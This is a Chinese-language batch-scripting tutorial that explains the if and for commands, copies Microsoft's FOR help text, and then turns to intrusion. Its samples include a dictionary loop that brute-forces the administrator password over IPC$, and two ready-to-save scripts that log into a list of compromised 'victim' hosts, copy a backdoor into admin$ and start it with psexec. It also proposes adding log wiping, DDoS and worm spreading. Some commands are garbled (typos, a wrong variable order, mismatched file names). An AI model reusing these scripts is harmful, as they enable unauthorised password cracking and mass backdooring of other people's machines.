Sample.bat的內容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag （應先判斷數值最高的錯誤碼）
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件運行後，將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e ，然後if語句將作出判斷，d表示執行標號為defrag的程序段，m表示執行標號為mem的程序段，e表示執行標號為end的程序段，每個程序段最後都以goto end將程序跳到end標號處，然後程序將顯示good bye，文件結束。

9.If 命令

if 表示將判斷是否符合規定的條件，從而決定執行不同的命令。 有三種格式:
1、if "參數" == "字元串" 待執行的命令
參數如果等於指定的字元串，則條件成立，運行命令，否則運行下一句。(注意是兩個等號）
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2、if exist 文件名 待執行的命令
如果有指定的文件，則條件成立，運行命令，否則運行下一句。
如if exist config.sys edit config.sys

3、if errorlevel / if not errorlevel 數字 待執行的命令
如果返回碼等於指定的數字，則條件成立，運行命令，否則運行下一句。
如if errorlevel 2 goto x2
DOS程序運行時都會返回一個數字給DOS，稱為錯誤碼errorlevel或稱返回碼，常見的返回碼為0、1。

10.for 命令
for 命令是一個比較復雜的命令，主要用於參數在指定的范圍內循環執行命令。
在批處理文件中使用 FOR 命令時，指定變數請使用 %%variable

for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一個單一字母可替換的參數。
(set) 指定一個或一組文件。可以使用通配符。
command 指定對每個文件執行的命令。
command-parameters 為特定命令指定參數或命令行開關。
在批處理文件中使用 FOR 命令時，指定變數請使用 %%variable
而不要用 %variable。變數名稱是區分大小寫的，所以 %i 不同於 %I

如果命令擴展名被啟用，下列額外的 FOR 命令格式會受到
支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符，則指定與目錄名匹配，而不與文件
名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-

檢查以 [drive:]path 為根的目錄樹，指向每個目錄中的
FOR 語句。如果在 /R 後沒有指定目錄，則使用當前
目錄。如果集僅為一個單點(.)字元，則枚舉該目錄樹。

FOR /L %variable IN (start,step,end) DO command [command-para

該集表示以增量形式從開始到結束的一個數字序列。
因此，(1,1,5) 將產生序列 1 2 3 4 5，(5,-1,1) 將產生
序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command

或者，如果有 usebackq 選項:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command

filenameset 為一個或多個文件名。繼續到 filenameset 中的
下一個文件之前，每份文件都已被打開、讀取並經過處理。
處理包括讀取文件，將其分成一行行的文字，然後將每行
解析成零或更多的符號。然後用已找到的符號字元串變數值
調用 For 循環。以默認方式，/F 通過每個文件的每一行中分開
的第一個空白符號。跳過空白行。您可通過指定可選 "options"
參數替代默認解析操作。這個帶引號的字元串包括一個或多個
指定不同解析選項的關鍵字。這些關鍵字為:

eol=c - 指一個行注釋字元的結尾(就一個)
skip=n - 指在文件開始時忽略的行數。
delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的
默認分隔符集。
tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代
的 for 本身。這會導致額外變數名稱的
格式為一個范圍。通過 nth 符號指定 m
符號字元串中的最後一個字元星號，
那麼額外的變數將在最後一個符號解析之
分配並接受行的保留文本。
usebackq - 指定新語法已在下類情況中使用:
在作為命令執行一個後引號的字元串並且
引號字元為文字字元串命令並允許在 fi
中使用雙引號擴起文件名稱。

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

會分析 myfile.txt 中的每一行，忽略以分號打頭的那些行，將
每行中的第二個和第三個符號傳遞給 for 程序體；用逗號和/或
空格定界符號。請注意，這個 for 程序體的語句引用 %i 來
取得第二個符號，引用 %j 來取得第三個符號，引用 %k
來取得第三個符號後的所有剩餘符號。對於帶有空格的文件
名，您需要用雙引號將文件名括起來。為了用這種方式來使
用雙引號，您還需要使用 usebackq 選項，否則，雙引號會
被理解成是用作定義某個要分析的字元串的。

%i 專門在 for 語句中得到說明，%j 和 %k 是通過
tokens= 選項專門得到說明的。您可以通過 tokens= 一行
指定最多 26 個符號，只要不試圖說明一個高於字母 z 或
Z 的變數。請記住，FOR 變數是單一字母、分大小寫和全局的；
同時不能有 52 個以上都在使用中。

您還可以在相鄰字元串上使用 FOR /F 分析邏輯；方法是，
用單引號將括弧之間的 filenameset 括起來。這樣，該字元
串會被當作一個文件中的一個單一輸入行。

最後，您可以用 FOR /F 命令來分析命令的輸出。方法是，將
括弧之間的 filenameset 變成一個反括字元串。該字元串會
被當作命令行，傳遞到一個子 CMD.EXE，其輸出會被抓進
內存，並被當作文件分析。因此，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

會枚舉當前環境中的環境變數名稱。

另外，FOR 變數參照的替換已被增強。您現在可以使用下列
選項語法:

~I - 刪除任何引號(")，擴充 %I
%~fI - 將 %I 擴充到一個完全合格的路徑名
%~dI - 僅將 %I 擴充到一個驅動器號
%~pI - 僅將 %I 擴充到一個路徑
%~nI - 僅將 %I 擴充到一個文件名
%~xI - 僅將 %I 擴充到一個文件擴展名
%~sI - 擴充的路徑只含有短名
%~aI - 將 %I 擴充到文件的文件屬性
%~tI - 將 %I 擴充到文件的日期/時間
%~zI - 將 %I 擴充到文件的大小
%~$PATH:I - 查找列在路徑環境變數的目錄，並將 %I 擴充
到找到的第一個完全合格的名稱。如果環境變數
未被定義，或者沒有找到文件，此組合鍵會擴充
空字元串

可以組合修飾符來得到多重結果:

%~dpI - 僅將 %I 擴充到一個驅動器號和路徑
%~nxI - 僅將 %I 擴充到一個文件名和擴展名
%~fsI - 僅將 %I 擴充到一個帶有短名的完整路徑名
%~dp$PATH:i - 查找列在路徑環境變數的目錄，並將 %I 擴充
到找到的第一個驅動器號和路徑。
%~ftzaI - 將 %I 擴充到類似輸出線路的 DIR

在以上例子中，%I 和 PATH 可用其他有效數值代替。%~ 語法
用一個有效的 FOR 變數名終止。選取類似 %I 的大寫變數名
比較易讀，而且避免與不分大小寫的組合鍵混淆。

以上是MS的官方幫助，下面我們舉幾個例子來具體說明一下For命令在入侵中的用途。

sample2：

利用For命令來實現對一台目標Win2k主機的暴力密碼破解。
我們用net use \\ip\ipc$ "password" /u:"administrator"來嘗試這和目標主機進行連接，當成功時記下密碼。
最主要的命令是一條：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%來表示admin的密碼，在dict.txt中這個取i%的值用net use 命令來連接。然後將程序運行結果傳遞給find命令－－
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ，這樣就ko了。

sample3：

你有沒有過手裡有大量肉雞等著你去種後門＋木馬呢？，當數量特別多的時候，原本很開心的一件事都會變得很郁悶：）。文章開頭就談到使用批處理文件，可以簡化日常或重復性任務。那麼如何實現呢？呵呵，看下去你就會明白了。

主要命令也只有一條：（在批處理文件中使用 FOR 命令時，指定變數使用 %%variable）
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法請參見上面的sample1，在這里它表示按順序將victim.txt中的內容傳遞給door.bat中的參數%i %j %k。
而cultivate.bat無非就是用net use命令來建立IPC$連接，並木馬＋後門到victim，然後用返回碼（If errorlever =）來篩選成功種植後門的主機，並echo出來，或者echo到指定的文件。
delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內容是什麼樣的了。應該根據%%i %%j %%k表示的對象來排列，一般就是 ip password username。
代碼雛形：

--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------

------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@ windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@p***ec \\%1 c:\winnt\system32\windrv32.exe
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
這只是一個自動種植後門批處理的雛形，兩個批處理和後門程序（Windrv32.exe）,PSexec.exe需放在統一目錄下.批處理內容
尚可擴展,例如:加入清除日誌+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).